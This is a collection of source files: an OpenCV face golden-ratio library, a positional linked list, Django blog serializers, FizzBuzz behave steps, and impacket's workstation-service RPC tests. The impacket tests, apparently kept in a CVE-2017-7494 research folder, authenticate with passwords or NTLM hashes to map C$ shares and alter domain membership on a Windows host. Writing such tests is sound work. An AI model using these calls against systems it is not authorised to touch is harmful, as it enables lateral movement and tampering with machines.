37d62de479405daa675c787823c9905b45f73cef | 5,108 | py | Python | Library Source/__init__.py | Aksoylu/GoldenFace | 10bdc6861b9d6bdb0cbfd3cd5917cb28eaeadc18 | [
"MIT"
] | 9 | 2021-05-20T15:48:28.000Z | 2022-03-19T09:49:33.000Z | Library Source/__init__.py | Aksoylu/GoldenFace | 10bdc6861b9d6bdb0cbfd3cd5917cb28eaeadc18 | [
"MIT"
] | null | null | null | Library Source/__init__.py | Aksoylu/GoldenFace | 10bdc6861b9d6bdb0cbfd3cd5917cb28eaeadc18 | [
"MIT"
] | 2 | 2021-08-23T15:47:06.000Z | 2022-03-17T00:37:03.000Z | #-- GoldenFace 1.0 (Face Golden Ratio & Cosine Similarity Library)--
# Author : Umit Aksoylu
# Date : 15.05.2020
# Description : Facial Cosine Similarity,Face Golden Ratio Calculation And Facial Landmark Detecting/Drawing Library
# Website : http://umit.space
# Mail : umit@aksoylu.space
# Github : https://github.com/Aksoylu/GoldenFace
import cv2
from GoldenFace import goldenMath
from GoldenFace import functions
from GoldenFace import landmark
import time
import pkg_resources
class goldenFace:
img = ""
image_gray = ""
landmark_detector = ""
face_detector = ""
faces = ""
facePoints = ""
faceBorders = ""
landmarks= ""
def __init__(self, path):
self.img = cv2.imread(path)
self.image_gray =cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)
self.landmark_detector = cv2.face.createFacemarkLBF()
filepath = pkg_resources.resource_filename(__name__, "landmark.yaml")
self.landmark_detector.loadModel(filepath)
#self.landmark_detector.loadModel("/landmark.yaml")
self.face_detector = cv2.CascadeClassifier(cv2.data.haarcascades+'haarcascade_frontalface_default.xml')
self.faces = self.face_detector.detectMultiScale(self.image_gray, 1.3, 5)
for faceBorders in self.faces:
(x,y,w,h) = faceBorders
self.faceBorders = faceBorders
_, self.landmarks = self.landmark_detector.fit(self.image_gray, self.faces)
self.facePoints = landmark.detectLandmark(self.landmarks)
break
def drawFaceCover(self,color):
(x,y,w,h) = self.faceBorders
self.img = cv2.rectangle(self.img,(x,y),(x+w, y+h),color,2)
def drawLandmark(self,color):
self.img = landmark.drawLandmark(self.img, self.landmarks,color)
def drawMask(self,color):
self.img = goldenMath.drawMask(self.img,self.faceBorders,self.facePoints,color)
def drawTGSM(self,color):
self.img = goldenMath.drawTGSM(self.img,self.faceBorders,self.facePoints,color)
def drawVFM(self,color):
self.img = goldenMath.drawVFM(self.img,self.faceBorders,self.facePoints,color)
def drawTZM(self,color):
self.img = goldenMath.drawTZM(self.img,self.faceBorders,self.facePoints,color)
def drawLC(self,color):
self.img = goldenMath.drawLC(self.img,self.faceBorders,self.facePoints,color)
def drawTSM(self,color):
self.img = goldenMath.drawTSM(self.img,self.faceBorders,self.facePoints,color)
def calculateTGSM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateTGSM(self.faceBorders,self.facePoints)
def calculateVFM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateVFM(self.faceBorders,self.facePoints)
def calculateTZM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateTZM(self.faceBorders,self.facePoints)
def calculateTSM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateTSM(self.faceBorders,self.facePoints)
def calculateLC(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateLC(self.faceBorders,self.facePoints)
def geometricRatio(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
TZM = goldenMath.calculateTZM(self.faceBorders,self.facePoints)
TGSM = goldenMath.calculateTGSM(self.faceBorders,self.facePoints)
VFM = goldenMath.calculateVFM(self.faceBorders,self.facePoints)
TSM = goldenMath.calculateTSM(self.faceBorders,self.facePoints)
LC = goldenMath.calculateLC(self.faceBorders,self.facePoints)
avg = (TZM + TGSM + VFM + TZM + TSM +LC) /6
return 100- avg
def face2Vec(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
vector = goldenMath.face2Vec(self.faceBorders,self.facePoints)
return vector
def faceSimilarity(self,vector2):
return goldenMath.vectorFaceSimilarity(self.face2Vec(),vector2)
#Golden similarity
def similarityRatio(self):
facevec = self.face2Vec()
filepath = pkg_resources.resource_filename(__name__, "landmark.yaml")
goldenFace = functions.loadFaceVec(filepath)
similarity = goldenMath.vectorFaceSimilarity(facevec,goldenFace)
return similarity
def getLandmarks(self):
return self.landmarks
def getFacialPoints(self):
return self.facePoints
def drawFacialPoints(self,color):
self.img = goldenMath.drawFacialPoints(self.img,self.facePoints,color)
def drawLandmarks(self,color):
self.img = goldenMath.drawLandmarks(self.img,self.landmarks,color)
def getFaceBorder(self):
return self.faceBorders
def writeImage(self,name):
cv2.imwrite(name, self.img)
def saveFaceVec(self,path):
functions.saveFaceVec(self.face2Vec(),path)
| 34.986301 | 116 | 0.703406 | 551 | 5,108 | 6.46098 | 0.22323 | 0.10618 | 0.096067 | 0.138483 | 0.449438 | 0.386798 | 0.241854 | 0.208708 | 0.105337 | 0 | 0 | 0.008495 | 0.193422 | 5,108 | 145 | 117 | 35.227586 | 0.855583 | 0.081832 | 0 | 0.09375 | 0 | 0 | 0.01304 | 0.007482 | 0 | 0 | 0 | 0 | 0 | 1 | 0.260417 | false | 0 | 0.0625 | 0.041667 | 0.541667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
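`faceSimilarity` and `similarityRatio` both funnel into `goldenMath.vectorFaceSimilarity`, whose source is not shown here. Given the library's name ("Cosine Similarity Library"), a plain cosine similarity is presumably what it computes — a self-contained sketch under that assumption:

```python
import math

def cosine_similarity(v1, v2):
    # cos(theta) = (v1 . v2) / (|v1| * |v2|)
    dot = sum(a * b for a, b in zip(v1, v2))
    n1 = math.sqrt(sum(a * a for a in v1))
    n2 = math.sqrt(sum(b * b for b in v2))
    return dot / (n1 * n2)

print(cosine_similarity([1.0, 0.0], [1.0, 0.0]))  # → 1.0
```

Identical face vectors score 1.0; orthogonal vectors score 0.0.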
37db76547d8110396ec9581a4b91dcffc5efc57c | 2,928 | py | Python | positional_list.py | ybillwang/dsinpython | e9b5b6096cf0c359fea20b200c50dac087ae0e43 | [
"MIT"
] | null | null | null | positional_list.py | ybillwang/dsinpython | e9b5b6096cf0c359fea20b200c50dac087ae0e43 | [
"MIT"
] | null | null | null | positional_list.py | ybillwang/dsinpython | e9b5b6096cf0c359fea20b200c50dac087ae0e43 | [
"MIT"
] | null | null | null | from doubly_linked_base import _DoublyLinkedBase
class PositionalList(_DoublyLinkedBase):
class Position:
def __init__(self, container, node):
self._container = container
self._node = node
def element(self):
return self._node._element
def __eq__(self, other):
return type(other) is type(self) and other._node is self._node
def __ne__(self, other):
return not (self == other)
def _validate(self, p):
if not isinstance(p, self.Position):
raise TypeError('p must be proper Position type')
if p._container is not self:
raise ValueError('p does not belong to this container')
if p._node._next is None:
raise ValueError('p is no longer valid')
return p._node
def _make_position(self, node):
if node is self._header or node is self._trailer:
return None
else:
return self.Position(self, node)
def first(self):
return self._make_position(self._header._next)
def last(self):
return self._make_position(self._trailer._prev)
def before(self, p):
node = self._validate(p)
return self._make_position(node._prev)
def after(self, p):
node = self._validate(p)
return self._make_position(node._next)
def __iter__(self):
cursor = self.first()
while cursor is not None:
yield cursor.element()
cursor = self.after(cursor)
def _insert_between(self, e, predecessor, successor):
node = super()._insert_between(e, predecessor, successor)
return self._make_position(node)
def add_first(self, e):
return self._insert_between(e, self._header, self._header._next)
def add_last(self, e):
return self._insert_between(e, self._trailer._prev, self._trailer)
def add_before(self, p, e):
original = self._validate(p)
        return self._insert_between(e, original._prev, original)
def add_after(self, p, e):
original = self._validate(p)
return self._insert_between(e, original, original._next)
def delete(self, p):
original = self._validate(p)
return self._delete_node(original)
def replace(self, p, e):
original = self._validate(p)
old_value = original._element
original._element = e
return old_value
def insertion_sort(L: PositionalList):
if len(L) > 1:
marker = L.first()
while marker != L.last():
pivot = L.after(marker)
value = pivot.element()
if value > marker.element():
marker = pivot
else:
walk = marker
                while walk != L.first() and L.before(walk).element() > value:
walk = L.before(walk)
L.delete(pivot)
L.add_before(walk, value)
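The `insertion_sort` above uses the classic marker/pivot/walk pattern over positions. Since `_DoublyLinkedBase` is defined in a separate module not shown here, a dependency-free sketch of the same walk logic on a plain Python list (indices standing in for positions) can help verify the loop condition:

```python
def insertion_sort_list(values):
    """Same marker/pivot/walk logic as the positional version, on a plain list."""
    for pivot in range(1, len(values)):     # pivot: the next element to place
        value = values[pivot]
        walk = pivot                        # walk left past larger elements
        while walk > 0 and values[walk - 1] > value:
            values[walk] = values[walk - 1]
            walk -= 1
        values[walk] = value                # insert value at its sorted position
    return values

print(insertion_sort_list([35, 15, 10, 5, 20]))  # [5, 10, 15, 20, 35]
```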
| 30.185567 | 74 | 0.597678 | 360 | 2,928 | 4.613889 | 0.213889 | 0.072246 | 0.04696 | 0.066225 | 0.255268 | 0.239615 | 0.184828 | 0.168573 | 0.128838 | 0.128838 | 0 | 0.000493 | 0.307036 | 2,928 | 96 | 75 | 30.5 | 0.818137 | 0 | 0 | 0.106667 | 0 | 0 | 0.02903 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.253333 | false | 0 | 0.013333 | 0.093333 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
37de836331151d39b86c391461ff4467bd638ded | 83 | py | Python | parboil/version.py | jneug/parboil | ef12c98a7f577694e6a915070ab3a639257351ce | [
"MIT"
] | 1 | 2021-03-09T20:09:48.000Z | 2021-03-09T20:09:48.000Z | parboil/version.py | jneug/parboil | ef12c98a7f577694e6a915070ab3a639257351ce | [
"MIT"
] | 20 | 2021-03-02T14:24:46.000Z | 2021-03-10T17:07:07.000Z | parboil/version.py | jneug/parboil | ef12c98a7f577694e6a915070ab3a639257351ce | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Contains version information"""
__version__ = "0.7.9"
| 13.833333 | 34 | 0.60241 | 10 | 83 | 4.6 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.156627 | 83 | 5 | 35 | 16.6 | 0.6 | 0.614458 | 0 | 0 | 0 | 0 | 0.192308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37df3726bb6459826a47732c8e4fe5d4be28aca7 | 1,773 | py | Python | blog/serializers.py | shinechoyeon/HareBLog | d614c9efa5453da7758acabdd06cb2858266176a | [
"MIT"
] | 1 | 2019-11-08T12:43:58.000Z | 2019-11-08T12:43:58.000Z | blog/serializers.py | shinechoyeon/HareBLog | d614c9efa5453da7758acabdd06cb2858266176a | [
"MIT"
] | null | null | null | blog/serializers.py | shinechoyeon/HareBLog | d614c9efa5453da7758acabdd06cb2858266176a | [
"MIT"
] | null | null | null | from rest_framework import serializers
from .models import Post, Category, Tag
from django.contrib.auth.models import User, AnonymousUser
class CategorySerializer(serializers.ModelSerializer):
"""
    Category serializer.
"""
owner = serializers.ReadOnlyField(source='owner.username')
# article = serializers.ReadOnlyField(source='article.pk')
class Meta:
model = Category
fields = ('id', 'name', 'is_nav', 'created_time', 'owner', 'article')
class NavSerializer(serializers.ModelSerializer):
"""
    Navigation (category) serializer.
"""
owner = serializers.ReadOnlyField(source='owner.username')
# def update(self, instance, validated_data):
# print(instance)
# return instance
# article = serializers.ReadOnlyField(source='article.pk')
class Meta:
model = Category
fields = ('id', 'name', 'is_nav', 'created_time', 'owner', 'article')
class PostSerializer(serializers.ModelSerializer):
"""
    Post serializer.
"""
owner = serializers.ReadOnlyField(source='owner.username')
category_id = serializers.ReadOnlyField(source='category.id')
comment = serializers.ReadOnlyField(source='comment.count')
category_name = serializers.ReadOnlyField(source='category.name')
class Meta:
model = Post
fields = ('id', 'title', 'desc', 'content',
'status', 'category', 'tag', 'created_time', 'owner', 'is_md', 'content_html', 'comment',
'category_name', 'category_id')
depth = 1
class TagSerializer(serializers.ModelSerializer):
owner = serializers.ReadOnlyField(source='owner.username')
class Meta:
model = Tag
fields = ('id', 'name', 'owner', 'article',
'status', 'created_time')
# TODO: migrate to the User directory ✓
| 28.142857 | 107 | 0.645234 | 171 | 1,773 | 6.614035 | 0.339181 | 0.190981 | 0.238727 | 0.123784 | 0.424403 | 0.424403 | 0.339523 | 0.339523 | 0.339523 | 0.199823 | 0 | 0.000723 | 0.219402 | 1,773 | 62 | 108 | 28.596774 | 0.815751 | 0.131416 | 0 | 0.4 | 0 | 0 | 0.202149 | 0 | 0 | 0 | 0 | 0.016129 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37e46f52dc162b86ab770d0b8bdc6f05e2c1d529 | 1,243 | py | Python | src/zad01/features/steps/fizzbuzz.py | TestowanieAutomatyczneUG/laboratorium_13-SzymonWilczewski | 276fe90c234dc0ae515ca7dc0d256272dbb460ba | [
"MIT"
] | null | null | null | src/zad01/features/steps/fizzbuzz.py | TestowanieAutomatyczneUG/laboratorium_13-SzymonWilczewski | 276fe90c234dc0ae515ca7dc0d256272dbb460ba | [
"MIT"
] | null | null | null | src/zad01/features/steps/fizzbuzz.py | TestowanieAutomatyczneUG/laboratorium_13-SzymonWilczewski | 276fe90c234dc0ae515ca7dc0d256272dbb460ba | [
"MIT"
] | null | null | null | from behave import *
from assertpy import *
from src.zad01.fizzbuzz import FizzBuzz
@given('instance of FizzBuzz')
def step_impl(context):
context.fizzbuzz = FizzBuzz()
@when('we input number 15')
def step_impl(context):
context.result = context.fizzbuzz.game(15)
@then('game will return FizzBuzz')
def step_impl(context):
assert_that(context.result).is_equal_to("FizzBuzz")
@when('we input number 3')
def step_impl(context):
context.result = context.fizzbuzz.game(3)
@then('game will return Fizz')
def step_impl(context):
assert_that(context.result).is_equal_to("Fizz")
@when('we input number 5')
def step_impl(context):
context.result = context.fizzbuzz.game(5)
@then('game will return Buzz')
def step_impl(context):
assert_that(context.result).is_equal_to("Buzz")
@when('we input number 1')
def step_impl(context):
context.result = context.fizzbuzz.game(1)
@then('game will return 1')
def step_impl(context):
assert_that(context.result).is_equal_to(1)
@when('we input string "text"')
def step_impl(context):
context.result = context.fizzbuzz.game("text")
@then('game will return "Wrong type!"')
def step_impl(context):
assert_that(context.result).is_equal_to("Wrong type!")
| 21.067797 | 58 | 0.726468 | 185 | 1,243 | 4.740541 | 0.205405 | 0.087799 | 0.13797 | 0.22577 | 0.676169 | 0.570125 | 0.570125 | 0.570125 | 0.570125 | 0.285063 | 0 | 0.013023 | 0.135157 | 1,243 | 58 | 59 | 21.431034 | 0.802791 | 0 | 0 | 0.305556 | 0 | 0 | 0.206758 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.305556 | false | 0 | 0.083333 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37e7ab4f9371204ff19e3279bb585a8f76511b31 | 19,344 | py | Python | Documents/Router/CVE-2017-7494/impacket/testcases/SMB_RPC/test_wkst.py | edinjapan/NSABlocklist | 2c624d216d314cb24e8eb91bed96ff30c8f9d632 | [
"ISC",
"MIT"
] | 201 | 2017-04-06T20:19:18.000Z | 2022-03-25T06:39:53.000Z | Documents/Router/CVE-2017-7494/impacket/testcases/SMB_RPC/test_wkst.py | edinjapan/NSABlocklist | 2c624d216d314cb24e8eb91bed96ff30c8f9d632 | [
"ISC",
"MIT"
] | 8 | 2017-12-31T01:45:54.000Z | 2021-06-08T19:35:58.000Z | Documents/Router/CVE-2017-7494/impacket/testcases/SMB_RPC/test_wkst.py | edinjapan/NSABlocklist | 2c624d216d314cb24e8eb91bed96ff30c8f9d632 | [
"ISC",
"MIT"
] | 46 | 2017-04-07T18:59:07.000Z | 2022-03-07T08:55:40.000Z | ###############################################################################
# Tested so far:
#
# NetrWkstaGetInfo
# NetrWkstaUserEnum
# NetrWkstaTransportEnum
# NetrWkstaTransportAdd
# NetrUseAdd
# NetrUseGetInfo
# NetrUseDel
# NetrUseEnum
# NetrWorkstationStatisticsGet
# NetrGetJoinInformation
# NetrJoinDomain2
# NetrUnjoinDomain2
# NetrRenameMachineInDomain2
# NetrValidateName2
# NetrGetJoinableOUs2
# NetrAddAlternateComputerName
# NetrRemoveAlternateComputerName
# NetrSetPrimaryComputerName
# NetrEnumerateComputerNames
#
# Not yet:
#
# Shouldn't dump errors against a win7
#
################################################################################
import unittest
import ConfigParser
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5 import wkst
from impacket.dcerpc.v5.ndr import NULL
class WKSTTests(unittest.TestCase):
def connect(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username,self.password, self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST, transfer_syntax = self.ts)
return dce, rpctransport
def test_NetrWkstaGetInfo(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaGetInfo()
request['ServerName'] = '\x00'*10
request['Level'] = 100
resp = dce.request(request)
resp.dump()
request['Level'] = 101
resp = dce.request(request)
resp.dump()
request['Level'] = 102
resp = dce.request(request)
resp.dump()
request['Level'] = 502
resp = dce.request(request)
resp.dump()
def test_hNetrWkstaGetInfo(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaGetInfo(dce, 100)
resp.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 101)
resp.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 102)
resp.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 502)
resp.dump()
def test_NetrWkstaUserEnum(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaUserEnum()
request['ServerName'] = '\x00'*10
request['UserInfo']['Level'] = 0
request['UserInfo']['WkstaUserInfo']['tag'] = 0
request['PreferredMaximumLength'] = 8192
resp = dce.request(request)
resp.dump()
request['UserInfo']['Level'] = 1
request['UserInfo']['WkstaUserInfo']['tag'] = 1
resp = dce.request(request)
resp.dump()
def test_hNetrWkstaUserEnum(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaUserEnum(dce, 0)
resp.dump()
resp = wkst.hNetrWkstaUserEnum(dce, 1)
resp.dump()
def test_NetrWkstaTransportEnum(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaTransportEnum()
request['ServerName'] = '\x00'*10
request['TransportInfo']['Level'] = 0
request['TransportInfo']['WkstaTransportInfo']['tag'] = 0
request['PreferredMaximumLength'] = 500
request['ResumeHandle'] = NULL
resp = dce.request(request)
resp.dump()
def test_hNetrWkstaTransportEnum(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaTransportEnum(dce, 0)
resp.dump()
def test_NetrWkstaSetInfo(self):
dce, rpctransport = self.connect()
request = wkst.NetrWkstaGetInfo()
request['ServerName'] = '\x00'*10
request['Level'] = 502
resp = dce.request(request)
resp.dump()
oldVal = resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit']
req = wkst.NetrWkstaSetInfo()
req['ServerName'] = '\x00'*10
req['Level'] = 502
req['WkstaInfo'] = resp['WkstaInfo']
req['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = 500
resp2 = dce.request(req)
resp2.dump()
resp = dce.request(request)
self.assertTrue(500 == resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] )
req['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = oldVal
resp2 = dce.request(req)
resp2.dump()
def test_hNetrWkstaSetInfo(self):
dce, rpctransport = self.connect()
resp = wkst.hNetrWkstaGetInfo(dce, 502)
resp.dump()
oldVal = resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit']
resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = 500
resp2 = wkst.hNetrWkstaSetInfo(dce, 502,resp['WkstaInfo']['WkstaInfo502'])
resp2.dump()
resp = wkst.hNetrWkstaGetInfo(dce, 502)
resp.dump()
self.assertTrue(500 == resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] )
resp['WkstaInfo']['WkstaInfo502']['wki502_dormant_file_limit'] = oldVal
resp2 = wkst.hNetrWkstaSetInfo(dce, 502,resp['WkstaInfo']['WkstaInfo502'])
resp2.dump()
def test_NetrWkstaTransportAdd(self):
dce, rpctransport = self.connect()
req = wkst.NetrWkstaTransportAdd()
req['ServerName'] = '\x00'*10
req['Level'] = 0
req['TransportInfo']['wkti0_transport_name'] = 'BETO\x00'
req['TransportInfo']['wkti0_transport_address'] = '000C29BC5CE5\x00'
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_FUNCTION') < 0:
raise
def test_hNetrUseAdd_hNetrUseDel_hNetrUseGetInfo_hNetrUseEnum(self):
dce, rpctransport = self.connect()
info1 = wkst.LPUSE_INFO_1()
info1['ui1_local'] = 'Z:\x00'
info1['ui1_remote'] = '\\\\127.0.0.1\\c$\x00'
info1['ui1_password'] = NULL
resp = wkst.hNetrUseAdd(dce, 1, info1)
resp.dump()
# We're not testing this call with NDR64, it fails and I can't see the contents
if self.ts == ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'):
return
resp = wkst.hNetrUseEnum(dce, 2)
resp.dump()
resp2 = wkst.hNetrUseGetInfo(dce, 'Z:', 3)
resp2.dump()
resp = wkst.hNetrUseDel(dce,'Z:')
resp.dump()
def test_NetrUseAdd_NetrUseDel_NetrUseGetInfo_NetrUseEnum(self):
dce, rpctransport = self.connect()
req = wkst.NetrUseAdd()
req['ServerName'] = '\x00'*10
req['Level'] = 1
req['InfoStruct']['tag'] = 1
req['InfoStruct']['UseInfo1']['ui1_local'] = 'Z:\x00'
req['InfoStruct']['UseInfo1']['ui1_remote'] = '\\\\127.0.0.1\\c$\x00'
req['InfoStruct']['UseInfo1']['ui1_password'] = NULL
resp2 = dce.request(req)
resp2.dump()
# We're not testing this call with NDR64, it fails and I can't see the contents
if self.ts == ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'):
return
req = wkst.NetrUseEnum()
req['ServerName'] = NULL
req['InfoStruct']['Level'] = 2
req['InfoStruct']['UseInfo']['tag'] = 2
req['InfoStruct']['UseInfo']['Level2']['Buffer'] = NULL
req['PreferredMaximumLength'] = 0xffffffff
req['ResumeHandle'] = NULL
resp2 = dce.request(req)
resp2.dump()
req = wkst.NetrUseGetInfo()
req['ServerName'] = '\x00'*10
req['UseName'] = 'Z:\x00'
req['Level'] = 3
resp2 = dce.request(req)
resp2.dump()
req = wkst.NetrUseDel()
req['ServerName'] = '\x00'*10
req['UseName'] = 'Z:\x00'
req['ForceLevel'] = wkst.USE_LOTS_OF_FORCE
resp2 = dce.request(req)
resp2.dump()
def test_NetrWorkstationStatisticsGet(self):
dce, rpctransport = self.connect()
req = wkst.NetrWorkstationStatisticsGet()
req['ServerName'] = '\x00'*10
req['ServiceName'] = '\x00'
req['Level'] = 0
req['Options'] = 0
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_hNetrWorkstationStatisticsGet(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrWorkstationStatisticsGet(dce, '\x00', 0, 0)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_NetrGetJoinInformation(self):
dce, rpctransport = self.connect()
req = wkst.NetrGetJoinInformation()
req['ServerName'] = '\x00'*10
req['NameBuffer'] = '\x00'
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_hNetrGetJoinInformation(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrGetJoinInformation(dce, '\x00')
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_NetrJoinDomain2(self):
dce, rpctransport = self.connect()
req = wkst.NetrJoinDomain2()
req['ServerName'] = '\x00'*10
req['DomainNameParam'] = '172.16.123.1\\FREEFLY\x00'
req['MachineAccountOU'] = 'OU=BETUS,DC=FREEFLY\x00'
req['AccountName'] = NULL
req['Password']['Buffer'] = '\x00'*512
req['Options'] = wkst.NETSETUP_DOMAIN_JOIN_IF_JOINED
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrJoinDomain2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrJoinDomain2(dce,'172.16.123.1\\FREEFLY\x00','OU=BETUS,DC=FREEFLY\x00',NULL,'\x00'*512, wkst.NETSETUP_DOMAIN_JOIN_IF_JOINED)
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrUnjoinDomain2(self):
dce, rpctransport = self.connect()
req = wkst.NetrUnjoinDomain2()
req['ServerName'] = '\x00'*10
req['AccountName'] = NULL
req['Password']['Buffer'] = '\x00'*512
#req['Password'] = NULL
req['Options'] = wkst.NETSETUP_ACCT_DELETE
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrUnjoinDomain2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrUnjoinDomain2(dce, NULL, '\x00'*512, wkst.NETSETUP_ACCT_DELETE)
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrRenameMachineInDomain2(self):
dce, rpctransport = self.connect()
req = wkst.NetrRenameMachineInDomain2()
req['ServerName'] = '\x00'*10
req['MachineName'] = 'BETUS\x00'
req['AccountName'] = NULL
req['Password']['Buffer'] = '\x00'*512
#req['Password'] = NULL
req['Options'] = wkst.NETSETUP_ACCT_CREATE
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrRenameMachineInDomain2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrRenameMachineInDomain2(dce, 'BETUS\x00', NULL, '\x00'*512, wkst.NETSETUP_ACCT_CREATE)
resp.dump()
except Exception, e:
if str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrValidateName2(self):
dce, rpctransport = self.connect()
req = wkst.NetrValidateName2()
req['ServerName'] = '\x00'*10
req['NameToValidate'] = 'BETO\x00'
req['AccountName'] = NULL
req['Password'] = NULL
req['NameType'] = wkst.NETSETUP_NAME_TYPE.NetSetupDomain
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_hNetrValidateName2(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrValidateName2(dce, 'BETO\x00', NULL, NULL, wkst.NETSETUP_NAME_TYPE.NetSetupDomain)
resp2.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_NetrGetJoinableOUs2(self):
dce, rpctransport = self.connect()
req = wkst.NetrGetJoinableOUs2()
req['ServerName'] = '\x00'*10
req['DomainNameParam'] = 'FREEFLY\x00'
req['AccountName'] = NULL
req['Password'] = NULL
req['OUCount'] = 0
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_hNetrGetJoinableOUs2(self):
dce, rpctransport = self.connect()
try:
resp = wkst.hNetrGetJoinableOUs2(dce,'FREEFLY\x00', NULL, NULL,0 )
resp.dump()
except Exception, e:
if str(e).find('0x8001011c') < 0:
raise
def test_NetrAddAlternateComputerName(self):
dce, rpctransport = self.connect()
req = wkst.NetrAddAlternateComputerName()
req['ServerName'] = '\x00'*10
req['AlternateName'] = 'FREEFLY\x00'
req['DomainAccount'] = NULL
req['EncryptedPassword'] = NULL
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
